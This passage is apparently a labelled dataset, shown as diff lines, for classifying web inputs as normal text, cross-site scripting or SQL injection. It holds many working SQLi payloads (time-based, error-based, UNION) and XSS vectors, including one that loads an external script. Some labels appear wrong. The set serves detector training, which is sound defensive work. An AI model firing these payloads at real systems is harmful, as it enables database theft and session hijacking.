if ( 8340 = 8340 ) then dbms_lock.sleep ( 5 )",2,SQLi,18599 +"1' where 1272 = 1272 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,18102 +"It will go on sale in ""select markets"" later this year.",0,normal,25905 +"1"" where 9014 = 9014 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --",2,SQLi,13574 +"<image oncopy=""alert(1)"" contenteditable>test</image>",1,XSS,4973 +"<div draggable=""true"" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed>",1,XSS,4897 +"<del draggable=""true"" ondrag=""alert(1)"">test</del>",1,XSS,7407 +"<multicol onmouseover=""alert(1)"">test</multicol>",1,XSS,7829 +"1 ) as qjjm where 3850 = 3850 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,13015 +"-9601' ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,21098 +"select * from users where id = 1 or ""{ ) "" or 1 = 1 -- 1",2,SQLi,11795 +"iif ( 1217 = 8831,1,1/0 )",2,SQLi,21236 +"<track onpaste=""alert(1)"" contenteditable>test</track>",1,XSS,8471 +"1 ) ) as aeat where 1007 = 1007 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13212 +Join the hiking expedition next weekend.,0,normal,22917 +<marquee onstart=alert(1)></marquee>,1,XSS,8162 +Select depart.,0,normal,24604 +"-8166"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""lcqb"" = ""lcqb",2,SQLi,17743 +-8486%' ) ) ) or 8571 = 8571--,2,SQLi,19114 +"or a""=""a",2,SQLi,9947 +"<style>@keyframes x{}</style><sub style=""animation-name:x"" onanimationstart=""alert(1)""></sub>",1,XSS,4603 +<x onmouseup=alert(1)>click this!,1,XSS,9301 +"&lt;IMG STYLE=\""xss&#58;expr/*XSS*/ession(alert('XSS'))\""&gt;",1,XSS,960 +"<shadow oncopy=""alert(1)"" contenteditable>test</shadow>",1,XSS,2395 +Delete photos.,0,normal,23000 +top[‘al\x65rt’](1),1,XSS,4706 +"-6108' ) union all select 2519,2519,2519,2519--",2,SQLi,16573 +"<tr onbeforecopy=""alert(1)"" contenteditable>test</tr>",1,XSS,8827 +<section id=x tabindex=1 onfocusin=alert(1)></section>,1,XSS,1877 +select,0,normal,26540 +Select a hairstyle for a new look.,0,normal,24201 +"<rb oncontextmenu=""alert(1)"">test</rb>",1,XSS,2550 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'qfsu' = 'qfsu",2,SQLi,14094 +1%' ) ) and 2006 = 2006,2,SQLi,18609 +( case when 5640 = 5640 then 5640 else null end ),2,SQLi,22280 +"1 where 7158 = 7158 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19062 +-7903 where 6699 = 6699 or 8571 = 8571--,2,SQLi,20429 +"1', ( select ( case when ( 3717 = 3717 ) then 1 else 3717* ( select 3717 from master..sysdatabases ) end ) )",2,SQLi,22094 +"<figure onbeforecopy=""alert(1)"" contenteditable>test</figure>",1,XSS,3417 +</title><script ~~~>confirm(1)</script ~~~>,1,XSS,9408 +"<applet onmousedown=""alert(1)"">test</applet>",1,XSS,5355 +<td id=x tabindex=1 onactivate=alert(1)></td>,1,XSS,2700 +1' and 6621 = 4681--,2,SQLi,20399 +"<acronym onkeydown=""alert(1)"" contenteditable>test</acronym>",1,XSS,4789 +"1' ) ) as namw where 1740 = 1740 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,14768 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # cdjm",2,SQLi,14826 +"<param onmouseup=""alert(1)"">test</param>",1,XSS,3348 +"1%' ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,18462 +"1"" where 9341 = 9341",2,SQLi,14645 +"<tr oncopy=""alert(1)"" contenteditable>test</tr>",1,XSS,4919 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,10888 +<blink onpointerout=alert(1)>XSS</blink>,1,XSS,3698 +"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'xzlx' like 'xzlx",2,SQLi,20155 +"<center onmouseover=""alert(1)"">test</center>",1,XSS,5251 +"1 ) as udjn where 6871 = 6871 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,17519 +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />,1,XSS,31 +Let's select toppings.,0,normal,24761 +"<a onbeforecopy=""alert(1)"" contenteditable>test</a>",1,XSS,50 +"<nextid oncopy=""alert(1)"" contenteditable>test</nextid>",1,XSS,8765 +"-7794"" ) union all select 3910,3910,3910,3910,3910,3910,3910,3910,3910,3910#",2,SQLi,12476 +Where's the remote?,0,normal,23453 +"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ""eiuc"" like ""eiuc",2,SQLi,13553 +"-8098%' ) union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#",2,SQLi,13065 +"1"" and ( 7424 = 2381 ) *2381 and ""dvju"" = ""dvju",2,SQLi,17873 +""" This allows you to select ""any"" or ""vacation rentals.",0,normal,26424 +1'|| ( select 'ydvg' from dual where 7108 = 7108,2,SQLi,15417 +"<address onbeforecut=""alert(1)"" contenteditable>test</address>",1,XSS,7579 +"The House Permanent Select Committee on Intelligence, led by Rep.",0,normal,25394 +"-5360' where 8178 = 8178 union all select 8178,8178,8178--",2,SQLi,19621 +<xmp id=x tabindex=1 onactivate=alert(1)></xmp>,1,XSS,6016 +""")) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,10949 +""")) waitfor delay '0:0:20' /*",2,SQLi,10842 +<marquee onpointerup=alert(1)>XSS</marquee>,1,XSS,6391 +<isindex type=image src=1 onerror=alert()>,1,XSS,5199 +"1%"" ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( ""%"" = """,2,SQLi,15969 +<pre onpointerover=alert(1)>XSS</pre>,1,XSS,6053 +<mark id=x tabindex=1 onfocusin=alert(1)></mark>,1,XSS,8137 +"select count ( * ) from generate_series ( 1,5000000 ) and ( ( 7240 = 7240",2,SQLi,12054 +"-3819' ) ) ) union all select 9014,9014,9014,9014,9014,9014--",2,SQLi,14166 +"1 ) where 2473 = 2473 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,16943 +<time onpointerup=alert(1)>XSS</time>,1,XSS,5285 +1%' rlike sleep ( 5 ) #,2,SQLi,13981 +"1"" ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ""umst"" = ""umst",2,SQLi,17347 +"1 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,18478 +"&#00;</form><input type&#61;""date"" onfocus=""alert(1)"">",1,XSS,813 +"1' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 'hllf' = 'hllf",2,SQLi,18511 +Select conceal.,0,normal,24653 +"<q onclick=""alert(1)"">test</q>",1,XSS,2898 +union ( select @@version ) --,2,SQLi,11762 +"<dt ondblclick=""alert(1)"">test</dt>",1,XSS,8240 +"<dl onmouseup=""alert(1)"">test</dl>",1,XSS,3373 +"-1083' ) union all select 9993,9993,9993,9993,9993,9993,9993,9993,9993--",2,SQLi,12629 +<q onpointerenter=alert(1)>XSS</q>,1,XSS,6179 +"1'+ ( select ttae where 4601 = 4601 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ) +'",2,SQLi,12982 +1'|| ( select 'xglm' from dual where 3556 = 3556 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,17270 +"<input name=""username"" value=""admin"" />",1,XSS,9164 +1 where 9620 = 9620 waitfor delay '0:0:5'--,2,SQLi,15905 +"<style>:target {color: red;}</style><object id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></object>",1,XSS,2768 +"<blink onbeforepaste=""alert(1)"" contenteditable>test</blink>",1,XSS,6333 +Find entries where valid.,0,normal,23283 +1 ) and 8417 = 5276#,2,SQLi,14833 +<button onMouseMove=javascript:alert(1)>,1,XSS,9599 +"<x 1="">"" onxxx=1",1,XSS,9279 +""" - Under ""Past Payments"" select ""Change All to Private.",0,normal,26435 +"1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'vgro' like 'vgro",2,SQLi,13189 +"<blink onclick=""alert(1)"">test</blink>",1,XSS,5139 +"<small onmouseout=""alert(1)"">test</small>",1,XSS,3482 +Select a flavor for the dish.,0,normal,23981 +&#0060;,1,XSS,9734 +"<spacer onmousedown=""alert(1)"">test</spacer>",1,XSS,6726 +<address onpointerdown=alert(1)>XSS</address>,1,XSS,5666 +"<listing ondblclick=""alert(1)"">test</listing>",1,XSS,7428 +"><h1><IFRAME SRC=# onmouseover=alert(document.cookie)""></IFRAME>123</h1>",1,XSS,1198 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></strike>",1,XSS,8635 +select,0,normal,26593 +<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>,1,XSS,9406 +admin'or 1 = 1 or '' = ',2,SQLi,11702 +<frame onpointerleave=alert(1)>XSS</frame>,1,XSS,2196 +Select your war.,0,normal,24882 +"1"" ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""blkt"" like ""blkt",2,SQLi,16603 +"Much attention has been paid recently to the cultivation of varieties of wheat that are immune to rust attacks, and care should be taken to select strains that have been proved able to resist the disease.",0,normal,25831 +"<del onkeyup=""alert(1)"" contenteditable>test</del>",1,XSS,3475 +But they are roaming a few select sections of American road.,0,normal,26258 +"1' ) where 6056 = 6056 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,15209 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></header>",1,XSS,4619 +"-9947"" ) ) ) union all select 8765,8765,8765,8765,8765#",2,SQLi,19672 +"1 ) ) as fmpr where 3103 = 3103 and elt ( 9970 = 9297,9297 ) --",2,SQLi,15658 +<svg><ol onload=alert(1)></ol>,1,XSS,1813 +"<bdo onkeydown=""alert(1)"" contenteditable>test</bdo>",1,XSS,4242 +"1' where 1673 = 1673 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,19366 +"<i onpaste=""alert(1)"" contenteditable>test</i>",1,XSS,5528 +javascript\x0A:javascript:confirm(1),1,XSS,9428 +"-2929"" ) ) ) union all select 8999,8999#",2,SQLi,13839 +"<shadow onmouseout=""alert(1)"">test</shadow>",1,XSS,8543 +Please unban pubg and ignore the lame excuses of PTA .And most important thing is youth has selected you as PM .,0,normal,26440 +"<fieldset onbeforecopy=""alert(1)"" contenteditable>test</fieldset>",1,XSS,5750 +"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*",2,SQLi,10855 +"1 ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 4744 = 4744",2,SQLi,15000 +"ABC<div style=""x:\xE2\x80\x8Aexpression(javascript:alert(1)"">DEF",1,XSS,452 +"1, ( select ( case when ( 5726 = 5275 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,16602 +Select a chair.,0,normal,22748 +"<ol onbeforepaste=""alert(1)"" contenteditable>test</ol>",1,XSS,2271 +"1%"" ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""%"" = """,2,SQLi,18327 +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;,1,XSS,1311 +"1%"" ) union all select null,null,null,null#",2,SQLi,13301 +"<optgroup oncopy=""alert(1)"" contenteditable>test</optgroup>",1,XSS,7922 +1' ) order by 1--,2,SQLi,17688 +<address onblur=alert(1) tabindex=1 id=x></address><input autofocus>,1,XSS,7979 +"<bgsound draggable=""true"" ondrag=""alert(1)"">test</bgsound>",1,XSS,4784 +"<element onmouseleave=""alert(1)"">test</element>",1,XSS,7887 "<IMG SRC=x ononline=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1132 -"1 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,17020 -"{""id"":null,""firstName"":""Krish"",""lastName"":""Muthukumarasamy"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25567 -"1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'gfll' = 'gfll",2,SQLi,20256 -"-8325 ) ) as ajxq where 6630 = 6630 union all select 6630,6630,6630,6630,6630,6630--",2,SQLi,17807 -end,2,SQLi,17175 -1' ) ) as grne where 9003 = 9003 order by 1--,2,SQLi,13697 -"<bgsound draggable=""true"" ondragstart=""alert(1)"">test</bgsound>",1,XSS,6240 -"1, ( select ( case when ( 5217 = 5217 ) then 1 else 5217* ( select 5217 from mysql.db ) end ) )",2,SQLi,20133 -"<basefont onbeforecopy=""alert(1)"" contenteditable>test</basefont>",1,XSS,7224 -"<meter onbeforepaste=""alert(1)"" contenteditable>test</meter>",1,XSS,2663 -Sort alphabetically.,0,normal,22962 -"-5840' ) or elt ( 1032 = 1032,3623 )",2,SQLi,21487 -",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* -,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,22702 -"1"" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""aixs"" = ""aixs",2,SQLi,13155 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""pdqm"" like ""pdqm",2,SQLi,18876 -", if is_srvrolemember ( 'sysadmin' ) > 0 waitfor delay '0:0:2' --",2,SQLi,11734 -"<style>@keyframes slidein {}</style><u style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></u>",1,XSS,3502 -<a onpointerleave=alert(1)>XSS</a>,1,XSS,3163 -<article onpointerover=alert(1)>XSS</article>,1,XSS,2267 -"<a href=""\x10javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,483 -"<div draggable=""true"" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo>",1,XSS,7338 -Select swap.,0,normal,24943 -select,2,SQLi,12093 +"-7313"" ) where 3606 = 3606 union all select 3606#",2,SQLi,13140 +"<q onmousedown=""alert(1)"">test</q>",1,XSS,4745 +"1 ) ) as xvyi where 6701 = 6701 union all select null,null,null,null#",2,SQLi,18186 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( '%' = '",2,SQLi,14186 +%2A%28%7C%28mail%3D%2A%29%29,2,SQLi,10060 +"Select ""Name,"" also at the top of the next tab.",0,normal,25638 +"select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'",2,SQLi,11300 +Specify criteria where applicable.,0,normal,23319 +"1' ) as ohcs where 9588 = 9588 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,18826 +"<picture><source srcset=""validimage.png""><img onloadstart=alert(1)></picture>",1,XSS,6603 +"<legend onkeypress=""alert(1)"" contenteditable>test</legend>",1,XSS,7500 +<colgroup onpointermove=alert(1)>XSS</colgroup>,1,XSS,4291 +"1"" ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,19499 +1 ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,20905 +or sleep(5)=',2,SQLi,10247 +"-6370' ) ) as sims where 9388 = 9388 union all select 9388,9388,9388,9388,9388,9388,9388,9388#",2,SQLi,13386 +<dialog id=x tabindex=1 onfocus=alert(1)></dialog>,1,XSS,7975 +"<applet onkeypress=""alert(1)"" contenteditable>test</applet>",1,XSS,2765 +"<h1 onkeyup=""alert(1)"" contenteditable>test</h1>",1,XSS,6182 +1'+ ( select rdwb where 2498 = 2498 and 3429 = 7639--,2,SQLi,17172 +And data protection for a select elite doesn't sound very equitable.,0,normal,26324 +"select * from users where id = 1 or ""?;"" or 1 = 1 -- 1",2,SQLi,11661 +"1' ) and make_set ( 7187 = 4625,4625 ) and ( 'diai' like 'diai",2,SQLi,19906 +Select copy.,0,normal,24569 +1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,12800 +1 ) as zzip where 5353 = 5353 and 3394 = 3092,2,SQLi,12692 +"<main oncopy=""alert(1)"" contenteditable>test</main>",1,XSS,2885 +"<iframe onmouseleave=""alert(1)"">test</iframe>",1,XSS,4339 +"<template onmouseout=""alert(1)"">test</template>",1,XSS,1995 +create user name identified by pass123 temporary tablespace temp default tablespace users;,2,SQLi,9978 +"<content draggable=""true"" ondragstart=""alert(1)"">test</content>",1,XSS,5729 +"<cite onmouseleave=""alert(1)"">test</cite>",1,XSS,5565 +Where's the best place to watch the sunset?,0,normal,23692 +"Select the "" subtract "" option - second from the left as indicated below.",0,normal,25570 +"<form><button formaction=""javascript:alert(1)"">//INJECTX",1,XSS,9810 +"1"" ) ) and 8329 = 5584#",2,SQLi,18305 +"<rb onbeforepaste=""alert(1)"" contenteditable>test</rb>",1,XSS,8762 +<title onpointermove=alert(1)>XSS</title>,1,XSS,5853 +"1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17330 +"1%"" ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,15986 +"<!--[if<img src=x onerror=alert(2)//]> -->//[""'`-->]]>]</div>",1,XSS,8966 +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus>,1,XSS,4167 +"1%"" and 1343 = 5939#",2,SQLi,20302 +"UNION ALL SELECT 1,2#",2,SQLi,10425 +Select the top choice.,0,normal,24235 +"-1668"" ) ) ) or 9323 = 9323#",2,SQLi,15313 +"You select a font, timeframe and title, then start writing.",0,normal,25025 +"<style>:target {color:red;}</style><rt id=x style=""transition:color 1s"" ontransitionend=alert(1)></rt>",1,XSS,2155 +"<fieldset onmouseleave=""alert(1)"">test</fieldset>",1,XSS,6840 +<bgsound onpointerleave=alert(1)>XSS</bgsound>,1,XSS,3354 +"<script>throw onerror=alert,1</script>",1,XSS,122 +"select * from users where id = 1 or $+<1 union select 1,@@VERSION -- 1",2,SQLi,11403 +1%' and ( 3020 = 3020 ) *6703 and '%' = ',2,SQLi,12869 +1' and ( 3020 = 3020 ) *6703 and 'hnvf' = 'hnvf,2,SQLi,16571 +"Outside of that promotion, the Select tier is usually $15.99.",0,normal,25755 +"<col oncontextmenu=""alert(1)"">test</col>",1,XSS,3126 +AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i,2,SQLi,10983 +The young Humanists would have gladly welcomed him into their select band.,0,normal,25320 +"1 ) ) as tbiq where 7159 = 7159 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15937 +"<image draggable=""true"" ondragstart=""alert(1)"">test</image>",1,XSS,7365 +"ABC<div style=""x:\xE2\x80\x89expression(javascript:alert(1)"">DEF",1,XSS,467 +"<rtc oncut=""alert(1)"" contenteditable>test</rtc>",1,XSS,6866 +Subcontracting firms are not able to select for final firm.,0,normal,25479 +"1%"" ) rlike sleep ( 5 ) #",2,SQLi,15267 +1'|| ( select 'jlon' where 1461 = 1461,2,SQLi,12926 +<script onerror=alert(1) src=/></script>,1,XSS,5087 +"Immediately afterward he was a member of a commission appointed ""to revise the laws in force in the state; to select, abridge, alter and digest them, so as to be accommodated to the present government.""",0,normal,25990 +"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,11776 +Where's the cafe?,0,normal,23508 +1 ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,19075 +"<nobr oncopy=""alert(1)"" contenteditable>test</nobr>",1,XSS,2365 +1' ) where 4500 = 4500,2,SQLi,19240 +"-2889 ) ) as iqzv where 1786 = 1786 union all select 1786,1786,1786,1786,1786,1786,1786,1786--",2,SQLi,16409 +"1' ) where 5883 = 5883 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,15389 +"<style>:target {color:red;}</style><bdi id=x style=""transition:color 1s"" ontransitionend=alert(1)></bdi>",1,XSS,2905 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></u>",1,XSS,3653 +"1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'nqam' = 'nqam",2,SQLi,18338 +"<ins onmouseleave=""alert(1)"">test</ins>",1,XSS,8397 +AND 7300=7300 AND ('pKlZ'='pKlZ,2,SQLi,10123 +<SCRIPT SRC=//.rocks/.j>,1,XSS,3690 +"1"" where 8089 = 8089",2,SQLi,15183 +"1' or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'aezm' like 'aezm",2,SQLi,13691 +select,0,normal,26513 +"<div style=""binding: url([link to code]);"">",1,XSS,1476 +Select your dream destination city.,0,normal,24315 +join,0,normal,23086 +Riders in select cities will be invited to participate via email.,0,normal,25705 +><<script>alert(document.cookie);//<</script>,1,XSS,1671 +"<html onbeforepaste=""alert(1)"" contenteditable>test</html>",1,XSS,7327 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""ejmj"" like ""ejmj",2,SQLi,17883 +"-5182"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,20198 +<aside onpointerleave=alert(1)>XSS</aside>,1,XSS,3054 +order,0,normal,23093 +"1%' ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,21459 +"1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'zxrb' = 'zxrb",2,SQLi,14712 +<time id=x tabindex=1 onbeforeactivate=alert(1)></time>,1,XSS,7841 +"1"" ) where 1024 = 1024 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,19832 +1' ) ) as bswc where 1635 = 1635 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,19968 +"waitfor delay '0:0:5' and ( ( ""ykgm"" = ""ykgm",2,SQLi,19768 +"><script+src=https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679""></script>",1,XSS,9762 +<command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus>,1,XSS,2009 +Specify filters where necessary.,0,normal,23309 +"</stylesheet>//[""'`-->]]>]</div>",1,XSS,8981 +"1%' ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,20322 +"<dl onmouseleave=""alert(1)"">test</dl>",1,XSS,2301 +"( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,14713 +"<object type=""text/x-scriptlet"" data=""http://jsfiddle.net/XLE63/ ""></object>",1,XSS,853 +"<footer draggable=""true"" ondragend=""alert(1)"">test</footer>",1,XSS,8844 +"1' ) union all select null,null,null,null,null,null,null,null--",2,SQLi,21985 +"<body onPropertyChange body onPropertyChange=""javascript:javascript:alert(1)""></body onPropertyChange>",1,XSS,358 +Select a gift.,0,normal,22759 +Sort the color swatches.,0,normal,22695 +<video id=x tabindex=1 onbeforeactivate=alert(1)></video>,1,XSS,1982 +"<style>:target {transform: rotate(180deg);}</style><sub id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></sub>",1,XSS,7478 +"1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'yznn' like 'yznn",2,SQLi,18884 +1' in boolean mode ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,21086 +"WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11202 +The party may take months to select a new leader.,0,normal,25362 +"select count ( * ) from generate_series ( 1,5000000 ) and '%' = '",2,SQLi,17022 +"<th onpaste=""alert(1)"" contenteditable>test</th>",1,XSS,6435 +"benchmark(10000000,MD5(1))#",2,SQLi,10000 +"1"" ) ) as azak where 4911 = 4911",2,SQLi,15290 +"1%"" ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,22290 +1 ) ) as ojjk where 3687 = 3687 and ( 4833 = 9218 ) *9218--,2,SQLi,20156 +"1"" ) where 9461 = 9461 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14109 +<x onmouseout=alert(1)>hover this!,1,XSS,9299 +1' ) ) ) and 4069 = 8786 and ( ( ( 'eftr' = 